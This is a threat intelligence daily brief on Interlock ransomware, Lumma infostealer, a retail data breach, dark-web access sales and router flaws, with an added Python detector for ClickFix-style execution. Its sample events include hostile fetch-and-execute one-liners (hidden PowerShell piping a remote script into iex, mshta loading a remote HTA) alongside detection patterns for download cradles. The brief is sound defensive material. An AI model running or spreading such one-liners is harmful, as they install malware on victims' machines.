ZeroFox Daily Intelligence Brief - July 23, 2025
|by Alpha Team

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.
Brief Highlights
- Joint Advisory Issued on Protecting Against Interlock Ransomware
- Lumma Infostealer Back After Law Enforcement Seizure
- 3.5 Million Customer Records Exposed in Alleged Data Breach at Australian Label SABO
Joint Advisory Issued on Protecting Against Interlock Ransomware
What we know: CISA and partners have issued a joint Cybersecurity Advisory warning organizations about Interlock ransomware, which targets popular operating systems and uses double extortion (data theft followed by encryption, with the stolen data used as leverage) after breaching networks.
Context: Interlock has been active since late September 2024, targeting businesses and critical infrastructure across North America and Europe. It gains initial access through drive-by downloads and ClickFix social engineering (lures such as fake CAPTCHA or error pages that instruct the user to paste and run a command themselves), then moves laterally within the network.
Analyst note: Interlock attacks are likely to result in network compromise, data theft, financial loss, and operational disruption. Organizations are advised to strengthen defenses via DNS filtering, firewalls, user awareness, timely patching, network segmentation, and robust access controls with multi-factor authentication.
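The advisory above names ClickFix as an initial-access vector and user awareness as a control, but awareness alone does not catch the one user who pastes the command. The following is an added hunting example, not code from the advisory, CISA or ZeroFox. It assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine, User) and relies on the fact that a command pasted into the Windows Run dialog is spawned by explorer.exe; the indicators are generic ClickFix tradecraft (download cradles, hidden windows, encoded commands, remote HTA), not Interlock-specific IOCs. The sample events are constructed for the example.

```python
"""Flag process-creation events consistent with ClickFix-style execution.

ClickFix lures ask the victim to paste a one-liner into the Run dialog or a
terminal. The Run dialog is owned by explorer.exe, so an interpreter whose
parent is explorer.exe and whose command line downloads, decodes or
evaluates remote content is a strong signal; the same command launched
from a terminal is scored lower because admins do that legitimately.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Interpreters and downloaders commonly used in ClickFix one-liners.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "bitsadmin.exe", "certutil.exe",
}

# (label, regex) pairs; a command line may match several.
INDICATORS = [
    ("encoded-command", re.compile(r"(?i)(^|\s)-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden-window", re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("download-cradle", re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|bitstransfer)\b")),
    ("invoke-expression", re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("remote-hta", re.compile(r"(?i)mshta(\.exe)?[\"']?\s+[\"']?https?://")),
    ("curl-pipe", re.compile(r"(?i)\bcurl(\.exe)?\b.*\|")),
]


@dataclass(frozen=True)
class Finding:
    user: str
    image: str
    parent: str
    severity: str          # "high" when launched via explorer.exe (Run dialog)
    reasons: Tuple[str, ...]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding if the event looks like a ClickFix execution, else None."""
    image = basename(event.get("Image", ""))
    if image not in LOLBINS:
        return None
    cmd = event.get("CommandLine", "")
    reasons = tuple(label for label, rx in INDICATORS if rx.search(cmd))
    if not reasons:
        return None
    parent = basename(event.get("ParentImage", ""))
    severity = "high" if parent == "explorer.exe" else "medium"
    return Finding(event.get("User", "?"), image, parent, severity, reasons)


def hunt(events: Iterable[dict]) -> List[Finding]:
    """Run analyze() over a stream of process-creation events."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample events (hypothetical hosts, users and URLs).
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"User": "CORP\\bob", "ParentImage": "C:\\Program Files\\WindowsApps\\Terminal\\WindowsTerminal.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe Get-Process | Sort-Object CPU"},
    {"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": '"powershell.exe" -w hidden -c "iex (irm https://captcha-check.example/verify.ps1)"'},
    {"User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" https://example.invalid/verify.hta'},
    {"User": "CORP\\bob", "ParentImage": "C:\\Program Files\\WindowsApps\\Terminal\\WindowsTerminal.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.user}: {f.parent} -> {f.image} ({', '.join(f.reasons)})")
```

In production the events come from Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled; the Run dialog also leaves history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth pulling during triage of a "high" hit.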
Lumma Infostealer Back After Law Enforcement Seizure
What we know: The Lumma infostealer has made a comeback after law enforcement seized five related domains in May 2025. Threat actors have been working to restore Lumma operations since the takedown.
Context: Researchers suspect that its resurgence involves additional precautions, such as moving from a trusted and popular internet infrastructure provider to a Russia-based service provider, while diversifying malware deployment and exploiting multiple distribution channels.
Analyst note: As Lumma scales its distribution, infection rates across corporate and personal devices are likely to spike. More stolen credentials, cookies, and sensitive data could end up for sale on dark web forums.
3.5 Million Customer Records Exposed in Alleged Data Breach at Australian Label SABO
Source: https://hackread.com/global-fashion-label-sabo-customer-records-leaked/
What we know: Australia-based fashion brand SABO has reportedly suffered a data breach exposing over 3.5 million customer records. The exposure is attributed to a misconfigured database that was reachable without a password.
Context: It is unknown if the database was managed by SABO or a third party. The leaked data, dated from 2015 to June 27, 2025, includes personally identifiable information (PII) for both retail and commercial customers, such as their names, addresses, order details, and phone numbers.
Analyst note: Threat actors are likely to use the data to target exposed individuals with phishing and social engineering, including extortion attempts. The leak is also likely to pose a reputational threat to the brand.
DEEP AND DARK WEB INTELLIGENCE
BreachForums user ari: Untested threat actor "ari" has advertised secure shell (SSH) access to a Linux server belonging to the Saudi Arabian Ministry of Transport on BreachForums. Ari did not specify a price and invited interested buyers to contact them via the forum's private messaging. Unauthorized access could enable threat actors to steal sensitive data, disrupt transport operations, or use the compromised server as a foothold for broader attacks.
VULNERABILITY AND EXPLOIT INTELLIGENCE
Helmholz Vulnerabilities: Eight vulnerabilities, including three flaws enabling operating system command execution, were discovered in Helmholz REX 100 industrial routers and have since been patched. If users do not update to the latest version (2.3.3), these vulnerabilities could enable threat actors to gain root access, exfiltrate sensitive data, and disrupt operations.
Affected products: Helmholz REX 100 routers running firmware version 2.3.2 and earlier
Tags: DIB, tlp:green